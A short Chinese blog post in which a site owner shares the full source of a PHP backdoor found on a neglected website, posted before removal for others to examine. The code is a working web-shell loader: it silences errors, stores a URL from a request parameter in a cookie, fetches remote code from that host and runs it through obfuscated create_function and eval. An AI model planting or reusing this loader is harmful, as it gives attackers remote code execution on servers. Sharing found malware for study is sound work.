逮的一个PHP后门

某个网站,久未打理.近期看到有提示后门.

删除之前特将代码放一份上来,有兴趣的看看它是干啥来的.

<?php
@ob_start();
error_reporting(0);
@ini_set('html_errors','0');
@ini_set('display_errors','0');
@ini_set('display_startup_errors','0');
@ini_set('log_errors','0');
@set_time_limit(0);
@clearstatcache();

if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    die('test');
}

//077beece2008164f7ddd2c44bfa126ee

if (isset($_REQUEST['c'])) {
    setcookie("key", "", time() - 3600);
}

//077beece2008164f7ddd2c44bfa126ee

if (isset($_REQUEST['key'])) {
    setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days.
    $_COOKIE['key'] = $_REQUEST['key'];
}

//077beece2008164f7ddd2c44bfa126ee

if (!isset($_COOKIE['key'])) {
    $html = <<<EOF
    <form method="POST" action="">
    <input type="text" name="key">
    <input type="submit">
    </form>
EOF;
    die($html);
}

//077beece2008164f7ddd2c44bfa126ee

$content =  remove_tags(_dl($_COOKIE['key']));

$func="cr"."eat"."e_fun"."cti"."on";

$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');

$remove_tags($content);

function _dl($url)
{
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $r = curl_exec($ch);
        curl_close($ch);
    } catch (Exception $e) {
        $r = file_get_contents($url);
    }
    return $r;
}

function remove_tags($content){
    return $content;
}

转载请注明：Linc Hu » 逮的一个PHP后门